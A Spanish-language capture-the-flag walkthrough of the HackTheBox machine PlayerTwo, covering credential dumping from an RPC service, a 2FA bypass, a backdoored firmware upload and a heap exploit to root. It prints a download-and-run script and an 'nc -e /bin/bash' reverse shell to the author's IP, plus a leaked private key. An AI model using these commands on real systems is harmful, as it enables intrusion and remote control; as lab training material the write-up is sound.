PlayerTwo es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Insane.
En este caso se trata de una máquina basada en el Sistema Operativo Linux.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina PlayerTwo 10.10.10.170 a /etc/hosts como playertwo.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 |
# Nmap 7.80 scan initiated Thu Jun 4 14:06:27 2020 as: nmap -sV -Pn -p- -sC -oA playertwo 10.10.10.170 Nmap scan report for playertwo.htb (10.10.10.170) Host is up (0.050s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 0e:7b:11:2c:5e:61:04:6b:e8:1c:bb:47:b8:4d:fe:5a (RSA) | 256 18:a0:87:56:64:06:17:56:4d:6a:8c:79:4b:61:56:90 (ECDSA) |_ 256 b6:4b:fc:e9:62:08:5a:60:e0:43:69:af:29:b3:27:14 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 8545/tcp open http (PHP 7.2.24-0ubuntu0.18.04.1) | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 Not Found | Date: Thu, 04 Jun 2020 12:09:00 GMT | Connection: close | X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1 | Content-Type: application/json | {"code":"bad_route","msg":"no handler for path "/nice%20ports%2C/Tri%6Eity.txt%2ebak"","meta":{"twirp_invalid_route":"GET /nice%20ports%2C/Tri%6Eity.txt%2ebak"}} | GetRequest: | HTTP/1.1 404 Not Found | Date: Thu, 04 Jun 2020 12:08:51 GMT | Connection: close | X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1 | Content-Type: application/json | {"code":"bad_route","msg":"no handler for path "/"","meta":{"twirp_invalid_route":"GET /"}} | HTTPOptions: | HTTP/1.1 404 Not Found | Date: Thu, 04 Jun 2020 12:08:51 GMT | Connection: close | X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1 | Content-Type: application/json | {"code":"bad_route","msg":"no handler for path "/"","meta":{"twirp_invalid_route":"OPTIONS /"}} | OfficeScan: | HTTP/1.1 404 Not Found | Date: Thu, 04 Jun 2020 12:09:00 GMT | Connection: close | X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1 | Content-Type: application/json |_ {"code":"bad_route","msg":"no handler for path "/"","meta":{"twirp_invalid_route":"GET /"}} |_http-title: Site doesn't have a title (application/json). 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8545-TCP:V=7.80%I=7%D=6/4%Time=5ED8E3F9%P=x86_64-pc-linux-gnu%r(Get SF:Request,FC,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Thu,\x2004\x20 SF:Jun\x202020\x2012:08:51\x20GMT\r\nConnection:\x20close\r\nX-Powered-By: SF:\x20PHP/7\.2\.24-0ubuntu0\.18\.04\.1\r\nContent-Type:\x20application/js SF:on\r\n\r\n{\"code\":\"bad_route\",\"msg\":\"no\x20handler\x20for\x20pat SF:h\x20\\\"\\/\\\"\",\"meta\":{\"twirp_invalid_route\":\"GET\x20\\/\"}}") SF:%r(HTTPOptions,100,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Thu,\x SF:2004\x20Jun\x202020\x2012:08:51\x20GMT\r\nConnection:\x20close\r\nX-Pow SF:ered-By:\x20PHP/7\.2\.24-0ubuntu0\.18\.04\.1\r\nContent-Type:\x20applic SF:ation/json\r\n\r\n{\"code\":\"bad_route\",\"msg\":\"no\x20handler\x20fo SF:r\x20path\x20\\\"\\/\\\"\",\"meta\":{\"twirp_invalid_route\":\"OPTIONS\ SF:x20\\/\"}}")%r(FourOhFourRequest,144,"HTTP/1\.1\x20404\x20Not\x20Found\ SF:r\nDate:\x20Thu,\x2004\x20Jun\x202020\x2012:09:00\x20GMT\r\nConnection: SF:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.24-0ubuntu0\.18\.04\.1\r\nConte SF:nt-Type:\x20application/json\r\n\r\n{\"code\":\"bad_route\",\"msg\":\"n SF:o\x20handler\x20for\x20path\x20\\\"\\/nice%20ports%2C\\/Tri%6Eity\.txt% SF:2ebak\\\"\",\"meta\":{\"twirp_invalid_route\":\"GET\x20\\/nice%20ports% SF:2C\\/Tri%6Eity\.txt%2ebak\"}}")%r(OfficeScan,FC,"HTTP/1\.1\x20404\x20No SF:t\x20Found\r\nDate:\x20Thu,\x2004\x20Jun\x202020\x2012:09:00\x20GMT\r\n SF:Connection:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.24-0ubuntu0\.18\.04\ SF:.1\r\nContent-Type:\x20application/json\r\n\r\n{\"code\":\"bad_route\", SF:\"msg\":\"no\x20handler\x20for\x20path\x20\\\"\\/\\\"\",\"meta\":{\"twi SF:rp_invalid_route\":\"GET\x20\\/\"}}"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Jun 4 14:07:32 2020 -- 1 IP address (1 host up) scanned in 65.13 seconds |
Una vez realizado el primer escaneo procederemos a enumerar los servicios descubiertos.
Enumeración
Comenzaremos por el puerto 80, el cual nos da un error al acceder, por lo que siguiendo crearemos en nuestro fichero hosts el nombre player2.htb apuntando a la ip de la máquina y accederemos al portal web que tiene el siguiente aspecto:
Revisando el código fuente, obtenemos otro dominio más de la máquina, así que nuevamente lo añadiremos al fichero /etc/hosts
1 |
10.10.10.170 product.player2.htb |
Revisamos en profundidad el portal me no conseguimos avanzar así que investigamos el otro puerto existente, el 8545, en el cual recibimos el siguiente error al acceder:
1 |
{"code":"bad_route","msg":"no handler for path \"\/"","meta":{"twirp_invalid_route":"GET \/"}} |
Se trata de twirp, un software simple de RPC, y con la ayuda de google encontramos el siguiente post donde nos da más información de su funcionamiento:
https://github.com/twitchtv/twirp/blob/master/docs/routing.md
Vista la información del enlace anterior, necesitaremos encontrar el fichero .proto, en el cual viene reflejada la información del servicio, por lo que utilizamos wfuzz para intentar encontrar dicho fichero.
Realizamos la prueba con varios diccionarios hasta dar con el idóneo y conseguir el fichero generated.proto en la url http://player2.htb/proto/generated.proto, cuyo contenido es el siguiente:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
syntax = "proto3"; package twirp.player2.auth; option go_package = "auth"; service Auth { rpc GenCreds(Number) returns (Creds); } message Number { int32 count = 1; // must be > 0 } message Creds { int32 count = 1; string name = 2; string pass = 3; } |
Así que con los datos encontrados lanzaremos la petición curl con la siguiente sintaxis:
1 |
POST /twirp/<package>.<Service>/<Method> |
Realizamos varias pruebas y acabamos encontrando un listado de usuarios con sus passwords:
1 2 3 4 5 6 7 8 9 10 11 |
$ curl -X POST http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds --header "Content-Type:application/json" --data '{}' {"name":"snowscan","pass":"XHq7_WJTA?QD_?E2"} {"name":"jkr","pass":"Lp-+Q8umLW5*7qkc"} {"name":"0xdf","pass":"ze+EKe-SGF^5uZQX"} {"name":"mprox","pass":"ze+EKe-SGF^5uZQX"} {"name":"mprox","pass":"XHq7_WJTA?QD_?E2"} {"name":"jkr","pass":"XHq7_WJTA?QD_?E2"} {"name":"jkr","pass":"tR@dQnwnZEk95*6#"} {"name":"jkr","pass":"ze+EKe-SGF^5uZQX"} {"name":"snowscan","pass":"XHq7_WJTA?QD_?E2"} {"name":"0xdf","pass":"Lp-+Q8umLW5*7qkc"} |
Así que a continuación accederemos a la url de product.player2.htb para intentar pasar el formulario de login:
Generamos un listado de usuarios y contraseñas y llevamos a cabo el ataque, consiguiendo acceder con las siguientes credenciales:
1 |
jkr:Lp-+Q8umLW5*7qkc |
Pero llegamos a una página con un MFA, que nos bloquea el paso de nuevo:
Revisando los directorios existentes con dirb descubrimos que existe la url /api/totp que nos será de utilidad en este paso, y revisando el texto de la página del 2FA descubrimos que necesitamos obtener los backup codes para poder avanar, así que lanzaremos una petición con curl para intentar obtener dicho token:
1 2 |
$ curl -X POST http://product.player2.htb/api/totp --data '{"action":"backup_codes"}' --header "Content-Type:application/json" --cookie "PHPSESSID=9qqsnjahii4d5142ac6e5b0isr" {"user":"jkr","code":"29389234823423"} |
Y una vez conseguido podemos saltarnos este paso y pasar la parte del login:
En esta página nos habla de un servicio diseñado para juegos donde encontramos, entre otras cosas, el siguiente texto:
1 2 |
Please read our documentation here to understand and work with our new protocol Protobs. We also coming up with a Responsible Vulnerable Disclosure Program in the future to understand more issues in our development cycle. Stay tuned for the updates. |
Junto con un enlace a un fichero pdf, en el cual vemos dos cosas más, un fichero .tar y una página de subida de ficheros.
Descomprimimos el fichero .tar y encontramos los siguientes archivos:
1 2 3 4 |
$ tar -tvf protobs_firmware_v1.0.tar -C protobs_firmware_v1.0/ -rw-r--r-- root/root 1245 2019-12-01 04:12 info.txt -rw-r--r-- root/root 17264 2019-12-01 08:27 Protobs.bin -rw-r--r-- root/root 35 2019-12-01 04:25 version |
En los ficheros info.txt y version no encontramos nada interesante así que pasamos al fichero binario y lo analizamos, en nuestro caso con radare2.
Encontramos en el mismo una función que llama a otra con un string y que posiblemente pueda ser la forma de conseguir saltar este paso:
Y buscando en google, obtenemos un post donde explica la posibilidad de parchear el fichero binario con dd en stackoverflow, así que vamos a ello.
Necesitaremos primero encontrar el string en el binario:
1 2 3 |
$ strings -t d Protobs.bin | grep stty 8420 stty raw -echo min 0 time 10 8449 stty sane |
Crearemos un fichero llamado s en nuestro caso para subir nc a la máquina y ejecutar el mismo para conseguir nuestra reverse shell con el siguiente contenido:
1 2 3 |
curl http://10.10.14.26/nc -o /tmp/nc chmod +x /tmp/nc /tmp/nc -e /bin/bash 10.10.14.26 4444 |
Y, posteriormente, crearemos un fichero llamado shell que descargará nuestro anterior fichero y tendrá el siguiente contenido:
1 |
curl 10.10.14.26/s | bash |
Completado este paso nos queda parchear el binario con dd:
1 2 3 4 |
$ dd if=shell of=Protobs.bin obs=1 seek=8420 conv=notrunc 0+1 registros leídos 33+0 registros escritos 33 bytes copied, 0,013608 s, 2,4 kB/s |
Una vez parcheado el binario, crearemos de nuevo el fichero .tar con los ficheros info.txt, version y nuestro binario parcheado y lo subiremos al portal y después de varios alert:
Conseguiremos que el mismo se verifique, firme y ejecute, consiguiendo con ello en nuestra escucha una shell con el usuario www-data:
1 2 3 4 5 |
$ nc -lvp 4444 listening on [any] 4444 ... connect to [10.10.14.26] from playertwo.htb [10.10.10.170] 43488 id uid=33(www-data) gid=33(www-data) groups=33(www-data) |
En este punto comenzamos a enumerar los usuarios y procesos existentes y encontramos uno muy interesante llamado mosqquito:
1 |
mosquit+ 1143 0.0 0.3 48024 5880 ? S 15:52 0:00 /usr/sbin/mosquitto -c /etc/mosquitto/mosquitto.conf |
Mosquitto es un agente de mensajes de código abierto que implementa el protocolo MQTT y que podemos utilizar para poder escalar privilegios tal y como indica en el siguiente post
https://blog.teserakt.io/2019/02/25/securing-the-mosquitto-mqtt-broker/
Así que ejecutamos el siguiente comando para intentar descubrir más información del sistema:
1 |
mosquitto_sub -h localhost -p 1883 -v -t '$SYS/#' |
Y da la casualidad, de que en el mismo obtenemos una clave ssh:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 |
$SYS/broker/version mosquitto version 1.4.15 $SYS/broker/timestamp Tue, 18 Jun 2019 11:42:22 -0300 $SYS/broker/uptime 803 seconds $SYS/broker/clients/total 8 $SYS/broker/clients/maximum 10 $SYS/broker/clients/inactive 8 $SYS/broker/clients/disconnected 8 $SYS/broker/clients/active 0 $SYS/broker/clients/connected 0 $SYS/broker/clients/expired 0 $SYS/broker/messages/stored 52 $SYS/broker/messages/received 210 $SYS/broker/messages/sent 364 $SYS/broker/subscriptions/count 16 $SYS/broker/retained messages/count 45 $SYS/broker/heap/current 31424 $SYS/broker/heap/maximum 40760 $SYS/broker/publish/messages/dropped 0 $SYS/broker/publish/messages/received 154 $SYS/broker/publish/messages/sent 0 $SYS/broker/publish/bytes/received 26936 $SYS/broker/publish/bytes/sent 26936 $SYS/broker/bytes/received 31864 $SYS/broker/bytes/sent 31598 $SYS/broker/load/messages/received/1min 21.59 $SYS/broker/load/messages/received/5min 15.25 $SYS/broker/load/messages/received/15min 9.35 $SYS/broker/load/messages/sent/1min 37.56 $SYS/broker/load/messages/sent/5min 26.46 $SYS/broker/load/messages/sent/15min 16.21 $SYS/broker/load/publish/received/1min 15.97 $SYS/broker/load/publish/received/5min 11.21 $SYS/broker/load/publish/received/15min 6.86 $SYS/broker/load/bytes/received/1min 3339.35 $SYS/broker/load/bytes/received/5min 2322.37 $SYS/broker/load/bytes/received/15min 1420.13 $SYS/broker/load/bytes/sent/1min 3314.65 $SYS/broker/load/bytes/sent/5min 2303.60 $SYS/broker/load/bytes/sent/15min 1408.40 $SYS/broker/load/sockets/1min 2.81 $SYS/broker/load/sockets/5min 2.02 $SYS/broker/load/sockets/15min 1.24 $SYS/broker/load/connections/1min 2.81 $SYS/broker/load/connections/5min 2.02 $SYS/broker/load/connections/15min 1.24 $SYS/broker/uptime 814 seconds $SYS/broker/clients/total 9 $SYS/broker/clients/active 1 $SYS/broker/clients/connected 1 $SYS/broker/load/messages/received/1min 19.80 $SYS/broker/load/messages/sent/1min 74.21 $SYS/broker/load/publish/received/1min 13.29 $SYS/broker/load/publish/sent/1min 41.12 $SYS/broker/load/bytes/received/1min 2824.75 $SYS/broker/load/bytes/sent/1min 4419.58 $SYS/broker/load/sockets/1min 3.25 $SYS/broker/load/connections/1min 3.25 $SYS/broker/load/messages/received/5min 15.09 $SYS/broker/load/messages/sent/5min 34.73 $SYS/broker/load/publish/received/5min 10.80 $SYS/broker/load/publish/sent/5min 8.84 $SYS/broker/load/bytes/received/5min 2248.38 $SYS/broker/load/bytes/sent/5min 2577.48 $SYS/broker/load/sockets/5min 2.14 $SYS/broker/load/connections/5min 2.14 $SYS/broker/load/messages/received/15min 9.37 $SYS/broker/load/messages/sent/15min 19.13 $SYS/broker/load/publish/received/15min 6.78 $SYS/broker/load/publish/sent/15min 2.98 $SYS/broker/load/bytes/received/15min 1406.12 $SYS/broker/load/bytes/sent/15min 1511.69 $SYS/broker/load/sockets/15min 1.30 $SYS/broker/load/connections/15min 1.30 $SYS/broker/messages/stored 55 $SYS/broker/subscriptions/count 17 $SYS/broker/retained messages/count 48 $SYS/broker/heap/current 36304 $SYS/broker/messages/received 212 $SYS/broker/messages/sent 411 $SYS/broker/publish/messages/sent 45 $SYS/broker/bytes/received 31913 $SYS/broker/bytes/sent 33415 $SYS/broker/publish/bytes/sent 27166 $SYS/broker/uptime 825 seconds $SYS/broker/load/messages/received/1min 16.49 $SYS/broker/load/messages/sent/1min 96.50 $SYS/broker/load/publish/received/1min 11.07 $SYS/broker/load/publish/sent/1min 68.95 $SYS/broker/load/bytes/received/1min 2351.58 $SYS/broker/load/bytes/sent/1min 5084.51 $SYS/broker/load/sockets/1min 2.71 $SYS/broker/load/connections/1min 2.71 $SYS/broker/load/messages/received/5min 14.55 $SYS/broker/load/messages/sent/5min 40.95 $SYS/broker/load/publish/received/5min 10.42 $SYS/broker/load/publish/sent/5min 15.98 $SYS/broker/load/bytes/received/5min 2167.43 $SYS/broker/load/bytes/sent/5min 2786.71 $SYS/broker/load/sockets/5min 2.07 $SYS/broker/load/connections/5min 2.07 $SYS/broker/load/messages/received/15min 9.25 $SYS/broker/load/messages/sent/15min 21.41 $SYS/broker/load/publish/received/15min 6.70 $SYS/broker/load/publish/sent/15min 5.46 $SYS/broker/load/bytes/received/15min 1389.04 $SYS/broker/load/bytes/sent/15min 1595.24 $SYS/broker/load/sockets/15min 1.28 $SYS/broker/load/connections/15min 1.28 $SYS/broker/heap/current 36336 $SYS/broker/messages/sent 449 $SYS/broker/publish/messages/sent 83 $SYS/broker/bytes/sent 34953 $SYS/broker/publish/bytes/sent 27336 $SYS/broker/uptime 836 seconds $SYS/broker/load/messages/received/1min 13.72 $SYS/broker/load/messages/sent/1min 107.75 $SYS/broker/load/publish/received/1min 9.21 $SYS/broker/load/publish/sent/1min 84.81 $SYS/broker/load/bytes/received/1min 1957.67 $SYS/broker/load/bytes/sent/1min 5385.88 $SYS/broker/load/sockets/1min 2.26 $SYS/broker/load/connections/1min 2.26 $SYS/broker/load/messages/received/5min 14.02 $SYS/broker/load/messages/sent/5min 45.36 $SYS/broker/load/publish/received/5min 10.04 $SYS/broker/load/publish/sent/5min 21.30 $SYS/broker/load/bytes/received/5min 2089.40 $SYS/broker/load/bytes/sent/5min 2934.21 $SYS/broker/load/sockets/5min 1.99 $SYS/broker/load/connections/5min 1.99 $SYS/broker/load/messages/received/15min 9.14 $SYS/broker/load/messages/sent/15min 23.14 $SYS/broker/load/publish/received/15min 6.61 $SYS/broker/load/publish/sent/15min 7.38 $SYS/broker/load/bytes/received/15min 1372.17 $SYS/broker/load/bytes/sent/15min 1659.48 $SYS/broker/load/sockets/15min 1.26 $SYS/broker/load/connections/15min 1.26 $SYS/broker/messages/sent 479 $SYS/broker/publish/messages/sent 113 $SYS/broker/bytes/sent 36215 $SYS/broker/publish/bytes/sent 27490 $SYS/broker/uptime 847 seconds $SYS/broker/load/messages/received/1min 11.43 $SYS/broker/load/messages/sent/1min 116.20 $SYS/broker/load/publish/received/1min 7.67 $SYS/broker/load/publish/sent/1min 97.10 $SYS/broker/load/bytes/received/1min 1629.74 $SYS/broker/load/bytes/sent/1min 5607.53 $SYS/broker/load/sockets/1min 1.88 $SYS/broker/load/connections/1min 1.88 $SYS/broker/load/messages/received/5min 13.52 $SYS/broker/load/messages/sent/5min 49.42 $SYS/broker/load/publish/received/5min 9.68 $SYS/broker/load/publish/sent/5min 26.23 $SYS/broker/load/bytes/received/5min 2014.17 $SYS/broker/load/bytes/sent/5min 3070.12 $SYS/broker/load/sockets/5min 1.92 $SYS/broker/load/connections/5min 1.92 $SYS/broker/load/messages/received/15min 9.03 $SYS/broker/load/messages/sent/15min 24.78 $SYS/broker/load/publish/received/15min 6.53 $SYS/broker/load/publish/sent/15min 9.22 $SYS/broker/load/bytes/received/15min 1355.50 $SYS/broker/load/bytes/sent/15min 1720.82 $SYS/broker/load/sockets/15min 1.25 $SYS/broker/load/connections/15min 1.25 $SYS/broker/messages/sent 508 $SYS/broker/publish/messages/sent 142 $SYS/broker/bytes/sent 37445 $SYS/broker/publish/bytes/sent 27640 $SYS/internal/firmware/signing Retrieving the key from aws instance $SYS/internal/firmware/signing Key retrieved.. $SYS/internal/firmware/signing -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEA7Gc/OjpFFvefFrbuO64wF8sNMy+/7miymSZsEI+y4pQyEUBA R0JyfLk8f0SoriYk0clR/JmY+4mK0s7+FtPcmsvYgReiqmgESc/brt3hDGBuVUr4 ... zxQNDwKBgQCBOLY8aLyv/Hi0l1Ve8Fur5bLQ4BwimY3TsJTFFwU4IDFQY78AczkK /1i6dn3iKSmL75aVKgQ5pJHkPYiTWTRq2a/y8g/leCrvPDM19KB5Zr0Z1tCw5XCz iZHQGq04r9PMTAFTmaQfMzDy1Hfo8kZ/2y5+2+lC7wIlFMyYze8n8g== -----END RSA PRIVATE KEY----- $SYS/broker/uptime 858 seconds $SYS/broker/clients/total 11 $SYS/broker/clients/maximum 11 $SYS/broker/clients/active 3 $SYS/broker/clients/connected 3 $SYS/broker/load/messages/received/1min 17.73 $SYS/broker/load/messages/sent/1min 136.93 $SYS/broker/load/publish/received/1min 10.95 $SYS/broker/load/publish/sent/1min 109.16 $SYS/broker/load/bytes/received/1min 3180.46 $SYS/broker/load/bytes/sent/1min 6116.41 $SYS/broker/load/sockets/1min 3.39 $SYS/broker/load/connections/1min 3.39 $SYS/broker/load/messages/received/5min 14.80 |
Obteniendo la flag de user
Con la clave ssh obtenida, probamos con los usuarios descubiertos en el fichero /etc/passwd y logramos acceder a la máquina con el usuario observer:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
ssh -i /home/asdf/.ssh/player2observer.pem observer@10.10.10.170 Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.2.5-050205-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Jun 4 16:09:01 UTC 2020 System load: 0.0 Processes: 179 Usage of /: 26.1% of 19.56GB Users logged in: 0 Memory usage: 26% IP address for ens33: 10.10.10.170 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 121 packages can be updated. 5 updates are security updates. Last login: Sun Dec 1 15:33:19 2019 from 172.16.118.129 observer@player2:~$ whoami observer observer@player2:~$ id uid=1000(observer) gid=1000(observer) groups=1000(observer) observer@player2:~$ observer@player2:~$ ls -l total 8 drwxr-x--- 2 observer observer 4096 Dec 17 10:47 Development -r-------- 1 observer observer 33 Sep 5 2019 user.txt observer@player2:~$ |
Y conseguimos la flag de user, bueno está siendo dura esta máquina, y aún nos queda la mitad de la misma.
Escalado de privilegios
Llegamos a este punto, volvemos a enumerar a ver si podemos obtener algo en claro en esta máquina y encontramos unos ficheros interesantes en la ruta /opt/Configuration_Utility
Nos descargaremos dichos ficheros y utilizaremos la utilidad patchelf para utilizar las librerías de nuestro sistema en lugar de las incluidas en el mismo:
1 2 |
patchelf Protobs --set-interpreter /lib64/ld-linux-x86-64.so.2 patchelf Protobs --remove-rpath /lib/x86_64-linux-gnu/ |
Obtendremos el código del binario mediante reversing utilizando la herramienta ghidra, para conocer que es lo que hace realmente el mismo.
Una vez analizada esta parte y descubiertas las vulnerabilidades generamos nuestro propio exploit en python y lo ejecutamos:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
python exploit.py [+] Binaries info [*] '/data/ctf/htb/machines/todo/playertwo.htb/files/privesc/Protobs' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x3fd000) [*] '/data/ctf/htb/machines/todo/playertwo.htb/files/privesc/libc.so.6' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [+] Connecting... [+] Connecting to player2.htb on port 22: Done [*] observer@player2.htb: Distro Ubuntu 18.04 OS: linux Arch: amd64 Version: 5.2.5 ASLR: Enabled [*] Working directory: '/opt/Configuration_Utility' [+] Starting remote process './Protobs' on player2.htb: pid 6273 [+] Starting attack... [+] Heap Leak: 0xaf92e0 [+] Libc Base: 0x7fe3510bd000 [*] Switching to interactive mode $ id uid=1000(observer) gid=1000(observer) euid=0(root) groups=1000(observer) # $ whoami root |
Consiguiendo root después de algunos minutos.
Obteniendo la flag de root
Una vez dentro como root sólo nos queda ir a su home y conseguir la flag:
1 2 3 4 5 6 7 8 9 10 11 |
# $ whoami root # $ cd /root # $ ls -l total 12 -rwx------ 1 root root 819 Nov 10 2019 broadcast.py -rwx------ 1 root root 905 Sep 13 2019 connection.py -r-------- 1 root root 33 Sep 5 2019 root.txt # $ cat root.txt 73DAXXXXXXXXXXXXXXXXXXXXXXXX8C5 # $ |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace https://www.hackthebox.eu/home/users/profile/103792